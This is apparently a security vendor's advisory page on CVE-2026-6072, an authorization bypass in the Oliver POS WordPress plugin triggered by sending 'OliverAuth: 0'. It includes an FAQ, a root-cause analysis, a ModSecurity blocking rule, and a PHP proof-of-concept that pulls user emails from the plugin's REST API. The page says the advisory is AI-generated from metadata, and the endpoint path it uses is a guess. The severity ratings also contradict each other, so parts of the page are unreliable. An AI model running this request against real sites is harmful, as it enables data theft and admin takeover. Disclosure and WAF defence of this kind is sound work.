What is CVE-2026-6072?

CVE-2026-6072 is a medium severity vulnerability found in the Oliver POS plugin for WordPress, affecting versions up to and including 2.4.2.6. It allows unauthenticated attackers to bypass authorization through a user-controlled key in the ‘OliverAuth’ header, granting access to sensitive REST API endpoints.

How does the vulnerability work?

The vulnerability arises from a loose PHP comparison in the oliver_pos_rest_authentication() function, where the ‘OliverAuth’ header is compared to an unset option. This allows attackers to send ‘OliverAuth: 0’, which evaluates to true, bypassing authentication and enabling access to the POS API.

Who is affected by this vulnerability?

All users of the Oliver POS plugin for WordPress who are running version 2.4.2.6 or earlier are affected. This includes any WordPress installations that utilize this plugin for point of sale functionality.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Oliver POS plugin installed. If it is version 2.4.2.6 or earlier, it is vulnerable. Additionally, you can test the API endpoints to see if the ‘OliverAuth’ header can bypass authentication.

What are the practical risks of this vulnerability?

The practical risks include unauthorized access to all POS API endpoints, allowing attackers to read sensitive user data, modify user profiles, and potentially take over administrator accounts. This can lead to data loss and service disruption.

How can I fix this vulnerability?

To fix the vulnerability, update the Oliver POS plugin to the latest version that addresses this issue. Additionally, modify the oliver_pos_rest_authentication() function to use strict comparison (===) instead of loose comparison (==) for the ‘OliverAuth’ header.

What does a CVSS score of 6.5 mean?

A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while the vulnerability does not pose an immediate critical threat, it can still lead to significant issues if exploited, particularly in the context of unauthorized access.

What is the proof of concept for this vulnerability?

The proof of concept provided demonstrates how an attacker can use a simple HTTP request with the ‘OliverAuth: 0’ header to access protected API endpoints. This shows the ease of exploitation and the potential for unauthorized access to sensitive information.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Oliver POS plugin until a fix can be applied. Additionally, review your site’s security settings and monitor for any suspicious activity.

How can I protect my site from similar vulnerabilities in the future?

To protect your site, regularly update all plugins and themes, conduct security audits, and implement security plugins that monitor for vulnerabilities. Additionally, follow best practices for user authentication and authorization.

Is there a way to report this vulnerability?

Yes, if you discover any additional issues or have insights regarding this vulnerability, you can report it to the plugin developers or through a responsible disclosure program. This helps improve the security of the plugin for all users.

Where can I find more information about CVE-2026-6072?

More information about CVE-2026-6072 can be found on security databases like the National Vulnerability Database (NVD) or through security research reports published by organizations like Atomic Edge.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 22, 2026

CVE-2026-6072: Oliver POS <= 2.4.2.6 – Unauthenticated Authorization Bypass Through User-Controlled Key to 'OliverAuth' Header (oliver-pos)

CVE ID CVE-2026-6072

Plugin oliver-pos

Severity Medium (CVSS 6.5)

CWE 639

Vulnerable Version 2.4.2.6

Patched Version —

Disclosed May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6072 (metadata-based): This vulnerability allows an unauthenticated attacker to bypass authorization in the Oliver POS plugin for WordPress, affecting all versions up to and including 2.4.2.6. The plugin protects its REST API namespace at /wp-json/pos-bridge/* using the oliver_pos_rest_authentication() permission callback. Atomic Edge analysis identifies the root cause as a loose PHP comparison (==) in the authentication check. The callback compares the attacker-supplied ‘OliverAuth’ header value against the ‘oliver_pos_authorization_token’ option stored in the WordPress database. On fresh installations where the admin has not completed the connection flow, this option is unset. get_option returns false for unset options. Due to PHP’s type juggling, the loose comparison ‘0’ == false evaluates to true. This is inferred from the CWE classification (639 – Authorization Bypass Through User-Controlled Key) and the vulnerability description. Atomic Edge research confirms that no code diff is available for verification, but the described mechanism is a classic PHP loose comparison vulnerability. The attack vector is straightforward. An attacker sends an HTTP request to any endpoint within /wp-json/pos-bridge/*. The request must include the custom HTTP header ‘OliverAuth: 0’. The attacker does not need authentication credentials. They can access any REST API endpoint in that namespace. Specific endpoints within pos-bridge allow reading user data (including administrator details), updating user profiles (including email addresses), and deleting non-admin users. Atomic Edge analysis indicates that an attacker can perform an admin account email reset, leading to site takeover through the ‘lost password’ flow. Remediation requires changing the PHP comparison from loose (==) to strict (===). The strict comparison ‘0’ === false always returns false, which prevents the bypass. Additionally, the plugin should validate that the oliver_pos_authorization_token option is set before performing any comparison. The fix should be applied in the oliver_pos_rest_authentication() permission callback within the plugin’s REST API registration. The impact of successful exploitation is critical. An attacker gains full access to all POS API endpoints without authentication. They can extract a list of all users, including administrator accounts with their email addresses and roles. They can modify user profiles, changing email addresses of administrators. This enables a password reset on the administrator account, granting full site takeover. An attacker could also delete non-admin users, causing data loss and service disruption. Atomic Edge research assesses this as a high-severity vulnerability due to the complete authentication bypass and the capability for privilege escalation to site administrator.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6072 (metadata-based)
# Block unauthenticated access to Oliver POS REST API with 'OliverAuth' header set to '0'
SecRule REQUEST_URI "@rx ^/wp-json/pos-bridge/" 
  "id:20266072,phase:1,deny,status:403,chain,msg:'CVE-2026-6072 - Oliver POS Authorization Bypass via OliverAuth:0',severity:'CRITICAL',tag:'CVE-2026-6072'"
  SecRule REQUEST_HEADERS:OliverAuth "@streq 0" 
    "chain"
    SecRule REQUEST_METHOD "@rx ^(?:GET|POST|PUT|DELETE|PATCH|OPTIONS)$" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6072 - Oliver POS <= 2.4.2.6 - Unauthenticated Authorization Bypass Through User-Controlled Key to 'OliverAuth' Header

// Configuration: Set the target WordPress site URL
$target_url = 'https://example.com'; // CHANGE THIS to the target site URL

// Initialize cURL
$ch = curl_init();

// Endpoint to get all users (inferred as a typical REST API endpoint in POS plugins)
$endpoint = $target_url . '/wp-json/pos-bridge/v1/users'; // Adjust endpoint as needed based on actual plugin endpoints

// Set headers for the request
$headers = [
    'OliverAuth: 0', // The vulnerable header value to bypass authentication
    'Content-Type: application/json',
    'Accept: application/json'
];

// Configure cURL options
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing; remove in production with valid SSL

// Execute the request
echo "[+] Sending request to: " . $endpoint . "n";
echo "[+] Using header: OliverAuth: 0nn";

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($response === false) {
    echo "[!] Error: " . curl_error($ch) . "n";
} else {
    echo "[+] HTTP Response Code: " . $http_code . "nn";
    echo "[+] Response Body:n";
    // Pretty print JSON if possible
    $decoded = json_decode($response, true);
    if ($decoded !== null) {
        echo json_encode($decoded, JSON_PRETTY_PRINT) . "n";
    } else {
        echo $response . "n";
    }
    
    // Check if we got successful access
    if ($http_code == 200 && $decoded !== null) {
        echo "n[+] SUCCESS: Authentication bypassed! The plugin returned user data.n";
        if (isset($decoded[0]['user_email'])) {
            echo "[+] Extracted email: " . $decoded[0]['user_email'] . "n";
        }
    } elseif ($http_code == 403 || $http_code == 401) {
        echo "n[-] Failed: Access denied. The target may be patched or the option is set.n";
    }
}

// Clean up
curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-6072?
Overview of the vulnerability
CVE-2026-6072 is a medium severity vulnerability found in the Oliver POS plugin for WordPress, affecting versions up to and including 2.4.2.6. It allows unauthenticated attackers to bypass authorization through a user-controlled key in the ‘OliverAuth’ header, granting access to sensitive REST API endpoints.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from a loose PHP comparison in the oliver_pos_rest_authentication() function, where the ‘OliverAuth’ header is compared to an unset option. This allows attackers to send ‘OliverAuth: 0’, which evaluates to true, bypassing authentication and enabling access to the POS API.
Who is affected by this vulnerability?
Identifying impacted users
All users of the Oliver POS plugin for WordPress who are running version 2.4.2.6 or earlier are affected. This includes any WordPress installations that utilize this plugin for point of sale functionality.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Oliver POS plugin installed. If it is version 2.4.2.6 or earlier, it is vulnerable. Additionally, you can test the API endpoints to see if the ‘OliverAuth’ header can bypass authentication.
What are the practical risks of this vulnerability?
Understanding the impact
The practical risks include unauthorized access to all POS API endpoints, allowing attackers to read sensitive user data, modify user profiles, and potentially take over administrator accounts. This can lead to data loss and service disruption.
How can I fix this vulnerability?
Mitigation steps
To fix the vulnerability, update the Oliver POS plugin to the latest version that addresses this issue. Additionally, modify the oliver_pos_rest_authentication() function to use strict comparison (===) instead of loose comparison (==) for the ‘OliverAuth’ header.
What does a CVSS score of 6.5 mean?
Interpreting the severity rating
A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while the vulnerability does not pose an immediate critical threat, it can still lead to significant issues if exploited, particularly in the context of unauthorized access.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept provided demonstrates how an attacker can use a simple HTTP request with the ‘OliverAuth: 0’ header to access protected API endpoints. This shows the ease of exploitation and the potential for unauthorized access to sensitive information.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Oliver POS plugin until a fix can be applied. Additionally, review your site’s security settings and monitor for any suspicious activity.
How can I protect my site from similar vulnerabilities in the future?
Best practices for WordPress security
To protect your site, regularly update all plugins and themes, conduct security audits, and implement security plugins that monitor for vulnerabilities. Additionally, follow best practices for user authentication and authorization.
Is there a way to report this vulnerability?
Responsible disclosure
Yes, if you discover any additional issues or have insights regarding this vulnerability, you can report it to the plugin developers or through a responsible disclosure program. This helps improve the security of the plugin for all users.
Where can I find more information about CVE-2026-6072?
Resources for further reading
More information about CVE-2026-6072 can be found on security databases like the National Vulnerability Database (NVD) or through security research reports published by organizations like Atomic Edge.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations